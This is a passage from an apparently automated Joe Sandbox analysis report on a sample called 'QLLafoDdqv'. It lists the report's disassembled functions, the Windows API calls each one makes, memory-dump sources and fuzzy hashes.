              • CreateThread.KERNEL32(00000000,?,006FCFF9,00000000,00000004,00000000), ref: 006FD218
              • GetLastError.KERNEL32 ref: 006FD224
              • __dosmaperr.LIBCMT ref: 006FD22B
              • ResumeThread.KERNEL32(00000000), ref: 006FD249
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Thread$CreateErrorLastResume__dosmaperr
              • String ID:
              • API String ID: 173952441-0
              • Opcode ID: 18c29ec41e2b1c2b9558a353b4b7d650681d0864a2681444ed1ce36b993396d3
              • Instruction ID: 89abd207151a9ce25d1bdd8af35620376d0c5e7fa719c8a31b5a77eac05ba926
              • Opcode Fuzzy Hash: 18c29ec41e2b1c2b9558a353b4b7d650681d0864a2681444ed1ce36b993396d3
              • Instruction Fuzzy Hash: 4501D63640520CBBDB125BA5DC09BBE7A6BEF82331F104219FB25922D0CB719A01C6E1
              Function 006D600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006D604C
              • GetStockObject.GDI32(00000011), ref: 006D6060
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006D606A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateMessageObjectSendStockWindow
              • String ID:
              • API String ID: 3970641297-0
              • Opcode ID: 2691cad14fcc98602785e7ca5b2b84be93d426f270ea6095a6835f482d173d9e
              • Instruction ID: 311bf313fd1fbb70a29bc3158dc5b6c022eb23ce523022bc88addb69fbcd9bf0
              • Opcode Fuzzy Hash: 2691cad14fcc98602785e7ca5b2b84be93d426f270ea6095a6835f482d173d9e
              • Instruction Fuzzy Hash: CE11C472901608BFEF125F94CD44EFA7B6AFF09354F004102FA1552210C776DC60DB90
              Function 006F3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 006F3B56
                • Part of subcall function 006F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006F3AD2
                • Part of subcall function 006F3AA3: ___AdjustPointer.LIBCMT ref: 006F3AED
              • _UnwindNestedFrames.LIBCMT ref: 006F3B6B
              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 006F3B7C
              • CallCatchBlock.LIBVCRUNTIME ref: 006F3BA4
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
              • String ID:
              • API String ID: 737400349-0
              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
              • Instruction ID: 1f596bf0503ba011754e39673dc30443a8c496877176a61627e2c481316bb0f5
              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
              • Instruction Fuzzy Hash: EF01293210014DBBDF125E95CC42EFB3B6AEF99754F044019FF5866221CB32E961DBA4
              Function 00703073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006D13C6,00000000,00000000,?,0070301A,006D13C6,00000000,00000000,00000000,?,0070328B,00000006,FlsSetValue), ref: 007030A5
              • GetLastError.KERNEL32(?,0070301A,006D13C6,00000000,00000000,00000000,?,0070328B,00000006,FlsSetValue,00772290,FlsSetValue,00000000,00000364,?,00702E46), ref: 007030B1
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0070301A,006D13C6,00000000,00000000,00000000,?,0070328B,00000006,FlsSetValue,00772290,FlsSetValue,00000000), ref: 007030BF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: aad9eb118b77bf40716785dee58b8cb55596121608d2526cf6530c027459d107
              • Instruction ID: 2b42031dc542b7c6846ea2d4c28435796d8e55af83550e18ab474f641d35d76e
              • Opcode Fuzzy Hash: aad9eb118b77bf40716785dee58b8cb55596121608d2526cf6530c027459d107
              • Instruction Fuzzy Hash: 8B01F732312326EBCB324B799C459677BDEAF45BA1B108720F94AE31C0D729D901C6E4
              Function 00737464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0073747F
              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00737497
              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007374AC
              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007374CA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Type$Register$FileLoadModuleNameUser
              • String ID:
              • API String ID: 1352324309-0
              • Opcode ID: c1934e0217c948e4999e4b9768f26eec37a66062bb1d9a9e2959997a72cdaae6
              • Instruction ID: 0df0b1a4cbc62c3d0eaf68b4a8e7a94822fa9f27aa2c58e5d4e4e60e8b35620c
              • Opcode Fuzzy Hash: c1934e0217c948e4999e4b9768f26eec37a66062bb1d9a9e2959997a72cdaae6
              • Instruction Fuzzy Hash: 8D117CF12053949BF7348F54EC08BA27FF8EB00B10F108569A656D6552D7B8F904DB50
              Function 0073B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
              Download Yara Rule
              APIs
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B0C4
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B0E9
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B0F3
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B126
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CounterPerformanceQuerySleep
              • String ID:
              • API String ID: 2875609808-0
              • Opcode ID: 3d15ceefd3109e122ef3687befabfb1fe61d184c39182a819dba6e2a2adf8496
              • Instruction ID: 2f319ecfdd969ad27f082ba8a7f9ea8a07068a593a9cf16dd9c20f6db508d642
              • Opcode Fuzzy Hash: 3d15ceefd3109e122ef3687befabfb1fe61d184c39182a819dba6e2a2adf8496
              • Instruction Fuzzy Hash: BC116171C0161CD7DF04AFE4D9596FEBB78FF0A711F108089DA81B6146CB7895508B55
              Function 00732DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
              Download Yara Rule
              APIs
              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00732DC5
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00732DD6
              • GetCurrentThreadId.KERNEL32 ref: 00732DDD
              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00732DE4
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
              • String ID:
              • API String ID: 2710830443-0
              • Opcode ID: b993afd267a88bedeba8cca67a3d790eca0ed482edef7e4405f90724afe940d8
              • Instruction ID: b45706a92af35b061271b0568ed4a8dac37550603f0354d57cce51ab442cff39
              • Opcode Fuzzy Hash: b993afd267a88bedeba8cca67a3d790eca0ed482edef7e4405f90724afe940d8
              • Instruction Fuzzy Hash: DAE06D722013247AEB212B62DC0EEFB7E6CEF42BA1F004015F107D10829AE98841C6B5
              Function 00768863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E9693
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96A2
                • Part of subcall function 006E9639: BeginPath.GDI32(?), ref: 006E96B9
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96E2
              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00768887
              • LineTo.GDI32(?,?,?), ref: 00768894
              • EndPath.GDI32(?), ref: 007688A4
              • StrokePath.GDI32(?), ref: 007688B2
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
              • String ID:
              • API String ID: 1539411459-0
              • Opcode ID: 959e9c5038c6a7227cecffa0efc5bc3393c7c477a74b4fd4e36d47a36259dd4b
              • Instruction ID: 2cc1c18390d1a5f86a6780f14cf707a2d8e2c9bd0bd4d9128a5efd4c13719e00
              • Opcode Fuzzy Hash: 959e9c5038c6a7227cecffa0efc5bc3393c7c477a74b4fd4e36d47a36259dd4b
              • Instruction Fuzzy Hash: D6F03A36041259BAEB136F94AC09FDA3F59AF4A310F44C100FA52651E1C7B95511CFAA
              Function 006E98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
              Download Yara Rule
              APIs
              • GetSysColor.USER32(00000008), ref: 006E98CC
              • SetTextColor.GDI32(?,?), ref: 006E98D6
              • SetBkMode.GDI32(?,00000001), ref: 006E98E9
              • GetStockObject.GDI32(00000005), ref: 006E98F1
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Color$ModeObjectStockText
              • String ID:
              • API String ID: 4037423528-0
              • Opcode ID: ffa1bd225921eef9bd2fc7271c5113f43289d53a282c626531e10fc8aaf937f0
              • Instruction ID: bf5f8d2a2da00ac26fa1ac98fa342632d882705ae41aa398280c76ccfd119ccd
              • Opcode Fuzzy Hash: ffa1bd225921eef9bd2fc7271c5113f43289d53a282c626531e10fc8aaf937f0
              • Instruction Fuzzy Hash: 01E06531244384AADB225B75FC09BE93F11AB12335F14C219F6FB540E1C3B94650DB11
              Function 0073162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
              Download Yara Rule
              APIs
              • GetCurrentThread.KERNEL32 ref: 00731634
              • OpenThreadToken.ADVAPI32(00000000,?,?,?,007311D9), ref: 0073163B
              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007311D9), ref: 00731648
              • OpenProcessToken.ADVAPI32(00000000,?,?,?,007311D9), ref: 0073164F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CurrentOpenProcessThreadToken
              • String ID:
              • API String ID: 3974789173-0
              • Opcode ID: e06761637a89cdd6dae6d644487237d8eedb1ed8b055ec0b8170b1c2b4863934
              • Instruction ID: b47e7c0917eca463b06563f46de632ec65e75d4311e549d7f9321fe0fb387975
              • Opcode Fuzzy Hash: e06761637a89cdd6dae6d644487237d8eedb1ed8b055ec0b8170b1c2b4863934
              • Instruction Fuzzy Hash: EEE08671601311EBE7201FE19E0DB663B7CAF44791F14C808F686D9080DABC4440C758
              Function 0072D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • GetDesktopWindow.USER32 ref: 0072D858
              • GetDC.USER32(00000000), ref: 0072D862
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0072D882
              • ReleaseDC.USER32(?), ref: 0072D8A3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 46fd10555ce78d5e5ca6f0be6f1f1b253eb038102eda950e347686c8d331e0d1
              • Instruction ID: a1e015248ba213f0ff686f7f09f9ad729269b6c2fb46886580e93bc2a68491f4
              • Opcode Fuzzy Hash: 46fd10555ce78d5e5ca6f0be6f1f1b253eb038102eda950e347686c8d331e0d1
              • Instruction Fuzzy Hash: F3E01AB5800305DFCB429FA0D808A7DBBB2FB08310F14D009E88BE7250C7BC9941AF48
              Function 0072D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
              Download Yara Rule
              APIs
              • GetDesktopWindow.USER32 ref: 0072D86C
              • GetDC.USER32(00000000), ref: 0072D876
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0072D882
              • ReleaseDC.USER32(?), ref: 0072D8A3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 8c30af589b94cf18ec6c2596215f439f906e7d8749e10eccf5c2566d2759a9b5
              • Instruction ID: b9fbc5aad1b9bdf5ef9f001c47bd890f516d206e9e9ccb70df9fd0237e653fe8
              • Opcode Fuzzy Hash: 8c30af589b94cf18ec6c2596215f439f906e7d8749e10eccf5c2566d2759a9b5
              • Instruction Fuzzy Hash: 02E01A70C00304DFCB429FA0D80866DBBB2FB08310B149009E98AE7250C7BC59019F48
              Function 00744D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00744ED4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Connection_wcslen
              • String ID: *$LPT
              • API String ID: 1725874428-3443410124
              • Opcode ID: a0259067a6e9edf8d1c7586cb12e727afa582bb906799311179c97b3c833ea3e
              • Instruction ID: ee6ea3af779c17143d1bd9e330c6f207bb9ee584a19bd1a47bffd699da79edb8
              • Opcode Fuzzy Hash: a0259067a6e9edf8d1c7586cb12e727afa582bb906799311179c97b3c833ea3e
              • Instruction Fuzzy Hash: 94914D75A002549FDB14DF58C484FAABBF1BF44304F198099E80A9F3A2D739EE85DB91
              Function 00757771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(0072569E,00000000,?,0076CC08,?,00000000,00000000), ref: 007578DD
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • CharUpperBuffW.USER32(0072569E,00000000,?,0076CC08,00000000,?,00000000,00000000), ref: 0075783B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BuffCharUpper$_wcslen
              • String ID: <sy
              • API String ID: 3544283678-4294649419
              • Opcode ID: c9159a4a275e924a04b3c4ddedb15c8861f3dea3807f2b8097501a6d778d6422
              • Instruction ID: 9ffc1710135f06a075a9cf6980cd7a11bb6445158324f7e8b8c3132c5d0309ba
              • Opcode Fuzzy Hash: c9159a4a275e924a04b3c4ddedb15c8861f3dea3807f2b8097501a6d778d6422
              • Instruction Fuzzy Hash: BB618371D141189BCF48EBE0DC91DFDB375BF14301B44452AF942A7291EF786A09DBA4
              Function 006EE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: #
              • API String ID: 0-1885708031
              • Opcode ID: 2bf76d0a4c130946404615e64769b2adbd71c5f3d5016cdee181a9b2b8cb4ac5
              • Instruction ID: 5e8112ec98d61a462b2bdbb46215fc54cda045109d30ecbbd29a8a1ef2388a89
              • Opcode Fuzzy Hash: 2bf76d0a4c130946404615e64769b2adbd71c5f3d5016cdee181a9b2b8cb4ac5
              • Instruction Fuzzy Hash: 45514335A01396DFDB15DF69D0816FA7BAAEF15310F248059E8919B3C0DB399E43CBA0
              Function 006EF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNEL32(00000000), ref: 006EF2A2
              • GlobalMemoryStatusEx.KERNEL32(?), ref: 006EF2BB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: GlobalMemorySleepStatus
              • String ID: @
              • API String ID: 2783356886-2766056989
              • Opcode ID: 9aa994e7cfe10a609439a920ce03e55d6472ace42a2e266f89344b50ffbaf49d
              • Instruction ID: 195248a5a8836f5fa29b98a90af3299b0432ef810a9389e6e1e61dd40b97c019
              • Opcode Fuzzy Hash: 9aa994e7cfe10a609439a920ce03e55d6472ace42a2e266f89344b50ffbaf49d
              • Instruction Fuzzy Hash: 0B5158718087499BD360AF10DC86BABBBF9FF84310F91884DF1D981195EB709529CB6B
              Function 00755745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007557E0
              • _wcslen.LIBCMT ref: 007557EC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BuffCharUpper_wcslen
              • String ID: CALLARGARRAY
              • API String ID: 157775604-1150593374
              • Opcode ID: 2837c5cb3da8bed441e28c5cd2debedea87dc2016890a234462c0b7e272c4e66
              • Instruction ID: fa7da8ce989b906a3eff5fcb515edae7df93156e5fd6fbbf7140e495702f836f
              • Opcode Fuzzy Hash: 2837c5cb3da8bed441e28c5cd2debedea87dc2016890a234462c0b7e272c4e66
              • Instruction Fuzzy Hash: D6419F31E00209DFCB14DFA9C8959FEBBB5EF59311F10402DE905A7251E7B9AD85CBA0
              Function 0074D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
              Download Yara Rule
              APIs
